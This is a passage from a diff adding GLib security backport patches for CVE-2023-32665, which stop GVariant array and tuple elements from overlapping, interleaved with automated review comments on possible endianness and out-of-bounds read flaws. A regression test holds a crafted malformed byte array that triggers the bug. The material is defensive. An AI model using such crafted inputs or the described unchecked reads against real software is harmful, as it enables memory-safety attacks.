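+- if (value.size == 0)
+- return TRUE;
+-
+- offset_size = gvs_get_offset_size (value.size);
+- last_end = gvs_read_unaligned_le (value.data + value.size -
+- offset_size, offset_size);
++ struct Offsets offsets = gvs_variable_sized_array_get_frame_offsets (value);
+
+- if (last_end > value.size)
++ if (!offsets.is_normal)
+ return FALSE;
+
+- offsets_array_size = value.size - last_end;
+-
+- if (offsets_array_size % offset_size)
+- return FALSE;
+-
+- offsets_array = value.data + value.size - offsets_array_size;
+- length = offsets_array_size / offset_size;
+-
+- if (length == 0)
++ if (value.size != 0 && offsets.length == 0)
+ return FALSE;
+
+ child.type_info = g_variant_type_info_element (value.type_info);
+@@ -803,14 +809,14 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ child.depth = value.depth + 1;
+ offset = 0;
+
+- for (i = 0; i < length; i++)
++ for (i = 0; i < offsets.length; i++)
+ {
+ gsize this_end;
+
+- this_end = gvs_read_unaligned_le (offsets_array + offset_size * i,
+- offset_size);
++ this_end = gvs_read_unaligned_le (offsets.array + offsets.offset_size * i,
++ offsets.offset_size);
+
+- if (this_end < offset || this_end > last_end)
++ if (this_end < offset || this_end > offsets.data_size)
+ return FALSE;
+
+ while (offset & alignment)
+@@ -832,7 +838,7 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ offset = this_end;
+ }
+
+- g_assert (offset == last_end);
++ g_assert (offset == offsets.data_size);
+
+ return TRUE;
+ }
+--
+2.24.4
+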
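Review bot: After this refactor `gvs_variable_sized_array_get_child()` (patch lines 96-141) uses the result of `gvs_variable_sized_array_get_frame_offsets()` without looking at `offsets.is_normal` or `offsets.length`. For a non-normal or empty offset table the helper returns a zero-initialised struct with `array == NULL` and `length == 0`, so `gvs_offsets_get_offset_n (&offsets, index_)` is only safe if every caller has already bounded `index_` by the child count; that check is not in the hunk. A guard such as `g_assert (index_ < offsets.length);` before the first offset read, or a comment stating the caller's obligation, would make that dependency explicit. The function body continues outside the hunk.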
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch
new file mode 100644
index 0000000000..e361cc7aad
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch
@@ -0,0 +1,417 @@
1From ade71fb544391b2e33e1859645726bfee0d5eaaf Mon Sep 17 00:00:00 2001
2From: William Manley <will@stb-tester.com>
3Date: Wed, 16 Aug 2023 03:12:21 +0000
4Subject: [PATCH] gvariant: Don't allow child elements to overlap with each
5 other
6
7If different elements of a variable sized array can overlap with each
8other then we can cause a `GVariant` to normalise to a much larger type.
9
10This commit changes the behaviour of `GVariant` with non-normal form data. If
11an invalid frame offset is found all subsequent elements are given their
12default value.
13
14When retrieving an element at index `n` we scan the frame offsets up to index
15`n` and if they are not in order we return an element with the default value
16for that type. This guarantees that elements don't overlap with each
17other. We remember the offset we've scanned up to so we don't need to
18repeat this work on subsequent accesses. We skip these checks for trusted
19data.
20
21Unfortunately this makes random access of untrusted data O(n) — at least
22on first access. It doesn't affect the algorithmic complexity of accessing
23elements in order, such as when using the `GVariantIter` interface. Also:
24the cost of validation will be amortised as the `GVariant` instance is
25continued to be used.
26
27I've implemented this with 4 different functions, 1 for each element size,
28rather than looping calling `gvs_read_unaligned_le` in the hope that the
29compiler will find it easy to optimise and should produce fairly tight
30code.
31
32Fixes: #2121
33
34CVE: CVE-2023-32665
35Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/ade71fb544391b2e33e1859645726bfee0d5eaaf]
36Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
37---
38 glib/gvariant-core.c | 35 ++++++++++++++++
39 glib/gvariant-serialiser.c | 86 ++++++++++++++++++++++++++++++++++++--
40 glib/gvariant-serialiser.h | 8 ++++
41 glib/tests/gvariant.c | 45 ++++++++++++++++++++
42 4 files changed, 171 insertions(+), 3 deletions(-)
43
44diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
45index aa0e0a0..9b51e15 100644
46--- a/glib/gvariant-core.c
47+++ b/glib/gvariant-core.c
48@@ -65,6 +65,7 @@ struct _GVariant
49 {
50 GBytes *bytes;
51 gconstpointer data;
52+ gsize ordered_offsets_up_to;
53 } serialised;
54
55 struct
56@@ -162,6 +163,24 @@ struct _GVariant
57 * if .data pointed to the appropriate number of nul
58 * bytes.
59 *
60+ * .ordered_offsets_up_to: If ordered_offsets_up_to == n this means that all
61+ * the frame offsets up to and including the frame
62+ * offset determining the end of element n are in
63+ * order. This guarantees that the bytes of element
64+ * n don't overlap with any previous element.
65+ *
66+ * For trusted data this is set to G_MAXSIZE and we
67+ * don't check that the frame offsets are in order.
68+ *
69+ * Note: This doesn't imply the offsets are good in
70+ * any way apart from their ordering. In particular
71+ * offsets may be out of bounds for this value or
72+ * may imply that the data overlaps the frame
73+ * offsets themselves.
74+ *
75+ * This field is only relevant for arrays of non
76+ * fixed width types.
77+ *
78 * .tree: Only valid when the instance is in tree form.
79 *
80 * Note that accesses from other threads could result in
81@@ -365,6 +384,7 @@ g_variant_to_serialised (GVariant *value)
82 (gpointer) value->contents.serialised.data,
83 value->size,
84 value->depth,
85+ value->contents.serialised.ordered_offsets_up_to,
86 };
87 return serialised;
88 }
89@@ -396,6 +416,7 @@ g_variant_serialise (GVariant *value,
90 serialised.size = value->size;
91 serialised.data = data;
92 serialised.depth = value->depth;
93+ serialised.ordered_offsets_up_to = 0;
94
95 children = (gpointer *) value->contents.tree.children;
96 n_children = value->contents.tree.n_children;
97@@ -439,6 +460,15 @@ g_variant_fill_gvs (GVariantSerialised *serialised,
98 g_assert (serialised->size == value->size);
99 serialised->depth = value->depth;
100
101+ if (value->state & STATE_SERIALISED)
102+ {
103+ serialised->ordered_offsets_up_to = value->contents.serialised.ordered_offsets_up_to;
104+ }
105+ else
106+ {
107+ serialised->ordered_offsets_up_to = 0;
108+ }
109+
110 if (serialised->data)
111 /* g_variant_store() is a public API, so it
112 * it will reacquire the lock if it needs to.
113@@ -481,6 +511,7 @@ g_variant_ensure_serialised (GVariant *value)
114 bytes = g_bytes_new_take (data, value->size);
115 value->contents.serialised.data = g_bytes_get_data (bytes, NULL);
116 value->contents.serialised.bytes = bytes;
117+ value->contents.serialised.ordered_offsets_up_to = G_MAXSIZE;
118 value->state |= STATE_SERIALISED;
119 }
120 }
121@@ -561,6 +592,7 @@ g_variant_new_from_bytes (const GVariantType *type,
122 serialised.type_info = value->type_info;
123 serialised.data = (guchar *) g_bytes_get_data (bytes, &serialised.size);
124 serialised.depth = 0;
125+ serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
126
127 if (!g_variant_serialised_check (serialised))
128 {
129@@ -610,6 +642,8 @@ g_variant_new_from_bytes (const GVariantType *type,
130 value->contents.serialised.data = g_bytes_get_data (bytes, &value->size);
131 }
132
133+ value->contents.serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
134+
135 g_clear_pointer (&owned_bytes, g_bytes_unref);
136
137 return value;
138@@ -1108,6 +1142,7 @@ g_variant_get_child_value (GVariant *value,
139 child->contents.serialised.bytes =
140 g_bytes_ref (value->contents.serialised.bytes);
141 child->contents.serialised.data = s_child.data;
142+ child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
143
144 return child;
145 }
146diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
147index c7c2114..fe0b1a4 100644
148--- a/glib/gvariant-serialiser.c
149+++ b/glib/gvariant-serialiser.c
150@@ -1,6 +1,7 @@
151 /*
152 * Copyright © 2007, 2008 Ryan Lortie
153 * Copyright © 2010 Codethink Limited
154+ * Copyright © 2020 William Manley
155 *
156 * This library is free software; you can redistribute it and/or
157 * modify it under the terms of the GNU Lesser General Public
158@@ -264,6 +265,7 @@ gvs_fixed_sized_maybe_get_child (GVariantSerialised value,
159 value.type_info = g_variant_type_info_element (value.type_info);
160 g_variant_type_info_ref (value.type_info);
161 value.depth++;
162+ value.ordered_offsets_up_to = 0;
163
164 return value;
165 }
166@@ -295,7 +297,7 @@ gvs_fixed_sized_maybe_serialise (GVariantSerialised value,
167 {
168 if (n_children)
169 {
170- GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1 };
171+ GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0 };
172
173 gvs_filler (&child, children[0]);
174 }
175@@ -317,6 +319,7 @@ gvs_fixed_sized_maybe_is_normal (GVariantSerialised value)
176 /* proper element size: "Just". recurse to the child. */
177 value.type_info = g_variant_type_info_element (value.type_info);
178 value.depth++;
179+ value.ordered_offsets_up_to = 0;
180
181 return g_variant_serialised_is_normal (value);
182 }
183@@ -358,6 +361,7 @@ gvs_variable_sized_maybe_get_child (GVariantSerialised value,
184 value.data = NULL;
185
186 value.depth++;
187+ value.ordered_offsets_up_to = 0;
188
189 return value;
190 }
191@@ -388,7 +392,7 @@ gvs_variable_sized_maybe_serialise (GVariantSerialised value,
192 {
193 if (n_children)
194 {
195- GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1 };
196+ GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0 };
197
198 /* write the data for the child. */
199 gvs_filler (&child, children[0]);
200@@ -408,6 +412,7 @@ gvs_variable_sized_maybe_is_normal (GVariantSerialised value)
201 value.type_info = g_variant_type_info_element (value.type_info);
202 value.size--;
203 value.depth++;
204+ value.ordered_offsets_up_to = 0;
205
206 return g_variant_serialised_is_normal (value);
207 }
208@@ -691,6 +696,32 @@ gvs_variable_sized_array_n_children (GVariantSerialised value)
209 return gvs_variable_sized_array_get_frame_offsets (value).length;
210 }
211
212+/* Find the index of the first out-of-order element in @data, assuming that
213+ * @data is an array of elements of given @type, starting at index @start and
214+ * containing a further @len-@start elements. */
215+#define DEFINE_FIND_UNORDERED(type) \
216+ static gsize \
217+ find_unordered_##type (const guint8 *data, gsize start, gsize len) \
218+ { \
219+ gsize off; \
220+ type current, previous; \
221+ \
222+ memcpy (&previous, data + start * sizeof (current), sizeof (current)); \
223+ for (off = (start + 1) * sizeof (current); off < len * sizeof (current); off += sizeof (current)) \
224+ { \
225+ memcpy (&current, data + off, sizeof (current)); \
226+ if (current < previous) \
227+ break; \
228+ previous = current; \
229+ } \
230+ return off / sizeof (current) - 1; \
231+ }
232+
233+DEFINE_FIND_UNORDERED (guint8);
234+DEFINE_FIND_UNORDERED (guint16);
235+DEFINE_FIND_UNORDERED (guint32);
236+DEFINE_FIND_UNORDERED (guint64);
237+
238 static GVariantSerialised
239 gvs_variable_sized_array_get_child (GVariantSerialised value,
240 gsize index_)
241@@ -706,6 +737,49 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
242 g_variant_type_info_ref (child.type_info);
243 child.depth = value.depth + 1;
244
245+ /* If the requested @index_ is beyond the set of indices whose framing offsets
246+ * have been checked, check the remaining offsets to see whether they’re
247+ * normal (in order, no overlapping array elements). */
248+ if (index_ > value.ordered_offsets_up_to)
249+ {
250+ switch (offsets.offset_size)
251+ {
252+ case 1:
253+ {
254+ value.ordered_offsets_up_to = find_unordered_guint8 (
255+ offsets.array, value.ordered_offsets_up_to, index_ + 1);
256+ break;
257+ }
258+ case 2:
259+ {
260+ value.ordered_offsets_up_to = find_unordered_guint16 (
261+ offsets.array, value.ordered_offsets_up_to, index_ + 1);
262+ break;
263+ }
264+ case 4:
265+ {
266+ value.ordered_offsets_up_to = find_unordered_guint32 (
267+ offsets.array, value.ordered_offsets_up_to, index_ + 1);
268+ break;
269+ }
270+ case 8:
271+ {
272+ value.ordered_offsets_up_to = find_unordered_guint64 (
273+ offsets.array, value.ordered_offsets_up_to, index_ + 1);
274+ break;
275+ }
276+ default:
277+ /* gvs_get_offset_size() only returns maximum 8 */
278+ g_assert_not_reached ();
279+ }
280+ }
281+
282+ if (index_ > value.ordered_offsets_up_to)
283+ {
284+ /* Offsets are invalid somewhere, so return an empty child. */
285+ return child;
286+ }
287+
288 if (index_ > 0)
289 {
290 guint alignment;
291@@ -840,6 +914,9 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
292
293 g_assert (offset == offsets.data_size);
294
295+ /* All offsets have now been checked. */
296+ value.ordered_offsets_up_to = G_MAXSIZE;
297+
298 return TRUE;
299 }
300
301@@ -1072,7 +1149,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
302 for (i = 0; i < length; i++)
303 {
304 const GVariantMemberInfo *member_info;
305- GVariantSerialised child;
306+ GVariantSerialised child = { 0, };
307 gsize fixed_size;
308 guint alignment;
309 gsize end;
310@@ -1132,6 +1209,9 @@ gvs_tuple_is_normal (GVariantSerialised value)
311 offset = end;
312 }
313
314+ /* All element bounds have been checked above. */
315+ value.ordered_offsets_up_to = G_MAXSIZE;
316+
317 {
318 gsize fixed_size;
319 guint alignment;
320diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
321index 81343e9..99d18ef 100644
322--- a/glib/gvariant-serialiser.h
323+++ b/glib/gvariant-serialiser.h
324@@ -29,6 +29,14 @@ typedef struct
325 guchar *data;
326 gsize size;
327 gsize depth; /* same semantics as GVariant.depth */
328+ /* If ordered_offsets_up_to == n this means that all the frame offsets up to and
329+ * including the frame offset determining the end of element n are in order.
330+ * This guarantees that the bytes of element n don't overlap with any previous
331+ * element.
332+ *
333+ * This is both read and set by g_variant_serialised_get_child for arrays of
334+ * non-fixed-width types */
335+ gsize ordered_offsets_up_to;
336 } GVariantSerialised;
337
338 /* deserialisation */
339diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
340index 0e5ec8e..967e9a1 100644
341--- a/glib/tests/gvariant.c
342+++ b/glib/tests/gvariant.c
343@@ -1,5 +1,6 @@
344 /*
345 * Copyright © 2010 Codethink Limited
346+ * Copyright © 2020 William Manley
347 *
348 * This library is free software; you can redistribute it and/or
349 * modify it under the terms of the GNU Lesser General Public
350@@ -1283,6 +1284,7 @@ random_instance_filler (GVariantSerialised *serialised,
351 serialised->size = instance->size;
352
353 serialised->depth = 0;
354+ serialised->ordered_offsets_up_to = 0;
355
356 g_assert_true (serialised->type_info == instance->type_info);
357 g_assert_cmpuint (serialised->size, ==, instance->size);
358@@ -5039,6 +5041,47 @@ test_normal_checking_array_offsets (void)
359 g_variant_unref (variant);
360 }
361
362+/* This is a regression test that we can't have non-normal values that take up
363+ * significantly more space than the normal equivalent, by specifying the
364+ * offset table entries so that array elements overlap.
365+ *
366+ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_832242 */
367+static void
368+test_normal_checking_array_offsets2 (void)
369+{
370+ const guint8 data[] = {
371+ 'h', 'i', '\0',
372+ 0x03, 0x00, 0x03,
373+ 0x06, 0x00, 0x06,
374+ 0x09, 0x00, 0x09,
375+ 0x0c, 0x00, 0x0c,
376+ 0x0f, 0x00, 0x0f,
377+ 0x12, 0x00, 0x12,
378+ 0x15, 0x00, 0x15,
379+ };
380+ gsize size = sizeof (data);
381+ const GVariantType *aaaaaaas = G_VARIANT_TYPE ("aaaaaaas");
382+ GVariant *variant = NULL;
383+ GVariant *normal_variant = NULL;
384+ GVariant *expected = NULL;
385+
386+ variant = g_variant_new_from_data (aaaaaaas, data, size, FALSE, NULL, NULL);
387+ g_assert_nonnull (variant);
388+
389+ normal_variant = g_variant_get_normal_form (variant);
390+ g_assert_nonnull (normal_variant);
391+ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 2);
392+
393+ expected = g_variant_new_parsed (
394+ "[[[[[[['hi', '', ''], [], []], [], []], [], []], [], []], [], []], [], []]");
395+ g_assert_cmpvariant (expected, variant);
396+ g_assert_cmpvariant (expected, normal_variant);
397+
398+ g_variant_unref (expected);
399+ g_variant_unref (normal_variant);
400+ g_variant_unref (variant);
401+}
402+
403 /* Test that a tuple with invalidly large values in its offset table is
404 * normalised successfully without looping infinitely. */
405 static void
406@@ -5206,6 +5249,8 @@ main (int argc, char **argv)
407 test_normal_checking_tuples);
408 g_test_add_func ("/gvariant/normal-checking/array-offsets",
409 test_normal_checking_array_offsets);
410+ g_test_add_func ("/gvariant/normal-checking/array-offsets2",
411+ test_normal_checking_array_offsets2);
412 g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
413 test_normal_checking_tuple_offsets);
414 g_test_add_func ("/gvariant/normal-checking/empty-object-path",
415--
4162.24.4
417
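Review bot: The `find_unordered_*` helpers generated by `DEFINE_FIND_UNORDERED` compare frame offsets in host byte order: each value is `memcpy`'d straight into a `guint16`/`guint32`/`guint64` and tested with `current < previous`, whereas the rest of the serialiser reads the same table through `gvs_read_unaligned_le()`. If that reader converts from little-endian, as its name suggests, the ordering check is only correct on little-endian hosts; on a big-endian target it can reject ordered tables and accept overlapping ones for untrusted input. Give the macro a conversion argument and apply it after both copies, e.g. `DEFINE_FIND_UNORDERED (guint16, GUINT16_FROM_LE)` with `current = le_to_native (current);`. Separately, `value.ordered_offsets_up_to` is written on a by-value `GVariantSerialised` parameter in `gvs_variable_sized_array_get_child()` and `gvs_variable_sized_array_is_normal()` (both bodies continue outside the quoted hunks); in the latter the store is immediately followed by `return TRUE`, so as far as this patch shows the scanned position is not remembered on the parent as the description says.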
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch
new file mode 100644
index 0000000000..c057729aae
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch
@@ -0,0 +1,113 @@
1From 345cae9c1aa7bf6752039225ef4c8d8d69fa8d76 Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Fri, 11 Aug 2023 04:09:12 +0000
4Subject: [PATCH] gvariant-serialiser: Factor out code to get bounds of a tuple
5 member
6
7This introduces no functional changes.
8
9Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
10
11Helps: #2121
12
13CVE: CVE-2023-32665
14Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/345cae9c1aa7bf6752039225ef4c8d8d69fa8d76]
15Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
16---
17 glib/gvariant-serialiser.c | 73 ++++++++++++++++++++++++--------------
18 1 file changed, 46 insertions(+), 27 deletions(-)
19
20diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
21index fe0b1a4..6f9b366 100644
22--- a/glib/gvariant-serialiser.c
23+++ b/glib/gvariant-serialiser.c
24@@ -942,6 +942,51 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
25 * for the tuple. See the notes in gvarianttypeinfo.h.
26 */
27
28+static void
29+gvs_tuple_get_member_bounds (GVariantSerialised value,
30+ gsize index_,
31+ gsize offset_size,
32+ gsize *out_member_start,
33+ gsize *out_member_end)
34+{
35+ const GVariantMemberInfo *member_info;
36+ gsize member_start, member_end;
37+
38+ member_info = g_variant_type_info_member_info (value.type_info, index_);
39+
40+ if (member_info->i + 1)
41+ member_start = gvs_read_unaligned_le (value.data + value.size -
42+ offset_size * (member_info->i + 1),
43+ offset_size);
44+ else
45+ member_start = 0;
46+
47+ member_start += member_info->a;
48+ member_start &= member_info->b;
49+ member_start |= member_info->c;
50+
51+ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
52+ member_end = value.size - offset_size * (member_info->i + 1);
53+
54+ else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
55+ {
56+ gsize fixed_size;
57+
58+ g_variant_type_info_query (member_info->type_info, NULL, &fixed_size);
59+ member_end = member_start + fixed_size;
60+ }
61+
62+ else /* G_VARIANT_MEMBER_ENDING_OFFSET */
63+ member_end = gvs_read_unaligned_le (value.data + value.size -
64+ offset_size * (member_info->i + 2),
65+ offset_size);
66+
67+ if (out_member_start != NULL)
68+ *out_member_start = member_start;
69+ if (out_member_end != NULL)
70+ *out_member_end = member_end;
71+}
72+
73 static gsize
74 gvs_tuple_n_children (GVariantSerialised value)
75 {
76@@ -997,33 +1042,7 @@ gvs_tuple_get_child (GVariantSerialised value,
77 }
78 }
79
80- if (member_info->i + 1)
81- start = gvs_read_unaligned_le (value.data + value.size -
82- offset_size * (member_info->i + 1),
83- offset_size);
84- else
85- start = 0;
86-
87- start += member_info->a;
88- start &= member_info->b;
89- start |= member_info->c;
90-
91- if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
92- end = value.size - offset_size * (member_info->i + 1);
93-
94- else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
95- {
96- gsize fixed_size;
97-
98- g_variant_type_info_query (child.type_info, NULL, &fixed_size);
99- end = start + fixed_size;
100- child.size = fixed_size;
101- }
102-
103- else /* G_VARIANT_MEMBER_ENDING_OFFSET */
104- end = gvs_read_unaligned_le (value.data + value.size -
105- offset_size * (member_info->i + 2),
106- offset_size);
107+ gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
108
109 /* The child should not extend into the offset table. */
110 if (index_ != g_variant_type_info_n_members (value.type_info) - 1)
111--
1122.24.4
113
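Review bot: `gvs_tuple_get_member_bounds()` reads the frame-offset table at `value.data + value.size - offset_size * (member_info->i + 1)` (and `+ 2` for the offset-ended case) without checking that the entry lies inside `value.size`, so it is only safe when the caller has already bounds-checked that exact member. In this patch the single call replaces inline code at the same point. CVE-2023-32665-0005.patch in the same commit also calls it for the last member, and CVE-2023-32665-0006.patch calls it in a loop placed ahead of the `offset_size * (member_info->i + 2) > value.size` test. In both cases the caller's size test, presumably made for the requested member only, does not cover the entries read, which for a short untrusted buffer means a read outside the serialised data. Moving the bounds test into the helper, and returning an end value that the callers' existing `end <= value.size` checks reject, keeps every call site safe.

```c
  /* Only read a frame offset when its table entry lies inside the value. */
  if (member_info->i + 1 &&
      offset_size * (member_info->i + 1) <= value.size)
    member_start = gvs_read_unaligned_le (value.data + value.size -
                                          offset_size * (member_info->i + 1),
                                          offset_size);
  else
    member_start = 0;

  /* … unchanged: a/b/c alignment arithmetic on member_start … */

  if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST &&
      offset_size * (member_info->i + 1) <= value.size)
    member_end = value.size - offset_size * (member_info->i + 1);
  else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
    {
      /* … unchanged: fixed_size query, member_end = member_start + fixed_size … */
    }
  else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_OFFSET &&
           offset_size * (member_info->i + 2) <= value.size)
    member_end = gvs_read_unaligned_le (value.data + value.size -
                                        offset_size * (member_info->i + 2),
                                        offset_size);
  else
    /* Table entry out of range: report an end no caller can accept. */
    member_end = G_MAXSIZE;
```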
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch
new file mode 100644
index 0000000000..7e516b07ab
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch
@@ -0,0 +1,80 @@
1From 73d0aa81c2575a5c9ae77dcb94da919579014fc0 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Fri, 11 Aug 2023 04:13:02 +0000
4Subject: [PATCH] gvariant-serialiser: Rework child size calculation
5
6This reduces a few duplicate calls to `g_variant_type_info_query()` and
7explains why they’re needed.
8
9Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
10
11Helps: #2121
12
13CVE: CVE-2023-32665
14Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/73d0aa81c2575a5c9ae77dcb94da919579014fc0]
15Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
16---
17 glib/gvariant-serialiser.c | 31 +++++++++----------------------
18 1 file changed, 9 insertions(+), 22 deletions(-)
19
20diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
21index 6f9b366..fb75923 100644
22--- a/glib/gvariant-serialiser.c
23+++ b/glib/gvariant-serialiser.c
24@@ -1007,14 +1007,18 @@ gvs_tuple_get_child (GVariantSerialised value,
25 child.depth = value.depth + 1;
26 offset_size = gvs_get_offset_size (value.size);
27
28+ /* Ensure the size is set for fixed-sized children, or
29+ * g_variant_serialised_check() will fail, even if we return
30+ * (child.data == NULL) to indicate an error. */
31+ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
32+ g_variant_type_info_query (child.type_info, NULL, &child.size);
33+
34 /* tuples are the only (potentially) fixed-sized containers, so the
35 * only ones that have to deal with the possibility of having %NULL
36 * data with a non-zero %size if errors occurred elsewhere.
37 */
38 if G_UNLIKELY (value.data == NULL && value.size != 0)
39 {
40- g_variant_type_info_query (child.type_info, NULL, &child.size);
41-
42 /* this can only happen in fixed-sized tuples,
43 * so the child must also be fixed sized.
44 */
45@@ -1032,29 +1036,12 @@ gvs_tuple_get_child (GVariantSerialised value,
46 else
47 {
48 if (offset_size * (member_info->i + 1) > value.size)
49- {
50- /* if the child is fixed size, return its size.
51- * if child is not fixed-sized, return size = 0.
52- */
53- g_variant_type_info_query (child.type_info, NULL, &child.size);
54-
55- return child;
56- }
57+ return child;
58 }
59
60- gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
61-
62 /* The child should not extend into the offset table. */
63- if (index_ != g_variant_type_info_n_members (value.type_info) - 1)
64- {
65- GVariantSerialised last_child;
66- last_child = gvs_tuple_get_child (value,
67- g_variant_type_info_n_members (value.type_info) - 1);
68- last_end = last_child.data + last_child.size - value.data;
69- g_variant_type_info_unref (last_child.type_info);
70- }
71- else
72- last_end = end;
73+ gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
74+ gvs_tuple_get_member_bounds (value, g_variant_type_info_n_members (value.type_info) - 1, offset_size, NULL, &last_end);
75
76 if (start < end && end <= value.size && end <= last_end)
77 {
78--
792.24.4
80
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch
new file mode 100644
index 0000000000..8558a7911f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch
@@ -0,0 +1,396 @@
1From 7cf6f5b69146d20948d42f0c476688fe17fef787 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Wed, 16 Aug 2023 12:09:06 +0000
4Subject: [PATCH] gvariant: Don't allow child elements of a tuple to overlap
5 each other
6
7This is similar to the earlier commit which prevents child elements of a
8variable-sized array from overlapping each other, but this time for
9tuples. It is based heavily on ideas by William Manley.
10
11Tuples are slightly different from variable-sized arrays in that they
12contain a mixture of fixed and variable sized elements. All but one of
13the variable sized elements have an entry in the frame offsets table.
14This means that if we were to just check the ordering of the frame
15offsets table, the variable sized elements could still overlap
16interleaving fixed sized elements, which would be bad.
17
18Therefore we have to check the elements rather than the frame offsets.
19
20The logic of checking the elements up to the index currently being
21requested, and caching the result in `ordered_offsets_up_to`, means that
22the algorithmic cost implications are the same for this commit as for
23variable-sized arrays: an O(N) cost for these checks is amortised out
24over N accesses to O(1) per access.
25
26Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
27
28Fixes: #2121
29
30CVE: CVE-2023-32665
31Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/7cf6f5b69146d20948d42f0c476688fe17fef787]
32Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
33---
34 glib/gvariant-core.c | 6 +-
35 glib/gvariant-serialiser.c | 40 ++++++++
36 glib/gvariant-serialiser.h | 7 +-
37 glib/gvariant.c | 1 +
38 glib/tests/gvariant.c | 181 +++++++++++++++++++++++++++++++++++++
39 5 files changed, 232 insertions(+), 3 deletions(-)
40
41diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
42index 9b51e15..b951cd9 100644
43--- a/glib/gvariant-core.c
44+++ b/glib/gvariant-core.c
45@@ -1,6 +1,7 @@
46 /*
47 * Copyright © 2007, 2008 Ryan Lortie
48 * Copyright © 2010 Codethink Limited
49+ * Copyright © 2022 Endless OS Foundation, LLC
50 *
51 * This library is free software; you can redistribute it and/or
52 * modify it under the terms of the GNU Lesser General Public
53@@ -179,7 +180,7 @@ struct _GVariant
54 * offsets themselves.
55 *
56 * This field is only relevant for arrays of non
57- * fixed width types.
58+ * fixed width types and for tuples.
59 *
60 * .tree: Only valid when the instance is in tree form.
61 *
62@@ -1117,6 +1118,9 @@ g_variant_get_child_value (GVariant *value,
63 */
64 s_child = g_variant_serialised_get_child (serialised, index_);
65
66+ /* Update the cached ordered_offsets_up_to, since @serialised will be thrown away when this function exits */
67+ value->contents.serialised.ordered_offsets_up_to = MAX (value->contents.serialised.ordered_offsets_up_to, serialised.ordered_offsets_up_to);
68+
69 /* Check whether this would cause nesting too deep. If so, return a fake
70 * child. The only situation we expect this to happen in is with a variant,
71 * as all other deeply-nested types have a static type, and hence should
72diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
73index fb75923..cd4a3e6 100644
74--- a/glib/gvariant-serialiser.c
75+++ b/glib/gvariant-serialiser.c
76@@ -942,6 +942,10 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
77 * for the tuple. See the notes in gvarianttypeinfo.h.
78 */
79
80+/* Note: This doesn’t guarantee that @out_member_end >= @out_member_start; that
81+ * condition may not hold true for invalid serialised variants. The caller is
82+ * responsible for checking the returned values and handling invalid ones
83+ * appropriately. */
84 static void
85 gvs_tuple_get_member_bounds (GVariantSerialised value,
86 gsize index_,
87@@ -1028,6 +1032,42 @@ gvs_tuple_get_child (GVariantSerialised value,
88 return child;
89 }
90
91+ /* If the requested @index_ is beyond the set of indices whose framing offsets
